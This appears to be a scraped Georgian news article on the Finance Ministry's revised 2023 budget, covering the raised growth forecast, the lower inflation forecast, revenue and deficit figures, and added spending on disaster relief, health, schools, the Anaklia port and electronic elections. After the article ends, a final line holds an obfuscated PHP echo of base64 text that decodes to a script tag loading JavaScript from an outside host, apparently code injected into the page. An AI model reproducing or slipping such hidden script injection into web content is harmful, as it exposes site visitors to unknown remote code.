celsiusi
ავერსი საქკაბელი

 ფინანსთა სამინისტროს ინფორმაციით, წლის მეორე ნახევარში ეკონომიკური ზრდის პროგნოზი კვლავ კონსერვატიულად იგეგმება და ჯამში, 2023 წელს ეკონომიკური ზრდის განახლებული პროგნოზი 6,5%-ს შეადგენს, ნაცვლად მანამდე არსებული 5%-ისა.

უწყების ცნობითვე, შემცირებულია ინფლაციის საპროგნოზო მაჩვენებელი და 2,6%-ს შეადგენს, რაც დაბალია მიზნობრივ (3%-იან) მაჩვენებელზე.

„დაგეგმილზე მაღალი ეკონომიკური ზრდის ხარჯზე 500,0 მლნ ლარზე მეტით იზრდება ნაერთი ბიუჯეტის საგადასახადო შემოსავლები და განისაზღვრება 19,4 მლრდ ლარის ოდენობით;

ნომინალური მთლიანი შიდა პროდუქტის მოცულობა განისაზღვრება 78,8 მლრდ ლარის ოდენობით;

დეფიციტის მოცულობა – მშპ-ის 2,8%-ია;

2023 წლის ბოლოსთვის საქართველოს მთავრობის ვალის მოსალოდნელი საპროგნოზო ზღვრული მოცულობა მშპ-ის 39,6%-ია;

ნაერთი ბიუჯეტის შემოსავლების გეგმური მაჩვენებელი იზრდება 835,0 მლნ ლარით და განისაზღვრება 21 640,0 მლნ ლარის ოდენობით;

სახელმწიფო ბიუჯეტის შემოსულობების ჯამური მაჩვენებელი იზრდება 257,0 მლნ ლარით და შეადგენს 22 171,2 მლნ ლარს;

წარმოდგენილი ცვლილებით, სახელმწიფო ბიუჯეტის ასიგნებები ჯამურად შეადგენს 22 311,3 მლნ ლარს, რაც დამტკიცებულ გეგმასთან შედარებით გაზრდილია 431,2 მლნ ლარით“, – აღნიშნულია ინფორმაციაში.

ამასთან, უწყებაში აღნიშნავენ, რომ დამატებით მოზიდული ფინანსური რესურსები მიიმართება: რეგიონებში, მათ შორის, რაჭასა და გურიაში მომხდარი სტიქიური მოვლენების შედეგების სალიკვიდაციო სამუშაოებისა და სტიქიით დაზარალებულთა სხვადასხვა კომპენსაციების დასაფინანსებლად; აღნიშნული თანხები გათვალისწინებულია, როგორც ინფრასტრუქტურის სამინისტროს ასიგნებებში, ისე მთავრობის სარეზერვო ფონდსა და რეგიონებში განსახორციელებელი პროექტების ფონდის დაფინანსებებში.

„250,0 მლნ ლარით იზრდება ჯანდაცვის სამინისტროს დაფინანსება, საიდანაც 120,0 მლნ დამატებით გამოყოფილია ჯანდაცვის პროგრამების დასაფინანსებლად, მათ შორის, გათვალისწინებულია ონკოლოგიური პაციენტი ბავშვების მკურნალობის საზღვარგარეთ დაფინანსების ხარჯებიც;

დამატებითი თანხები მიიმართება განათლების მიმართულებით. 34,8 მლნ ლარით იზრდება საჯარო სკოლების მშენებლობა-რეაბილიტაციის პროგრამის დაფინანსება;

20,0 მლნ ლარია გათვალისწინებული ანაკლიის პორტისთვის საჭირო ინფრასტრუქტურის მშენებლობის დაწყებისთვის;

დამატებითი თანხები მიიმართება შინაგან საქმეთა სამინისტროსა და თავდაცვის სამინისტროს შესაძლებლობების განვითარებისთვის.

ცენტრალური საარჩევნო კომისიის დაფინანსება იზრდება 21,2 მლნ ლარის ოდენობით, რაც დაკავშირებულია 2024 წელს საპარლამენტო არჩევნების ელექტრონულად ჩატარებისთვის საჭირო აპარატურისა და მომსახურების ხარჯების ნაწილობრივი დაფინანსებისათვის“, – აღნიშნულია ინფორმაციაში.

310
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");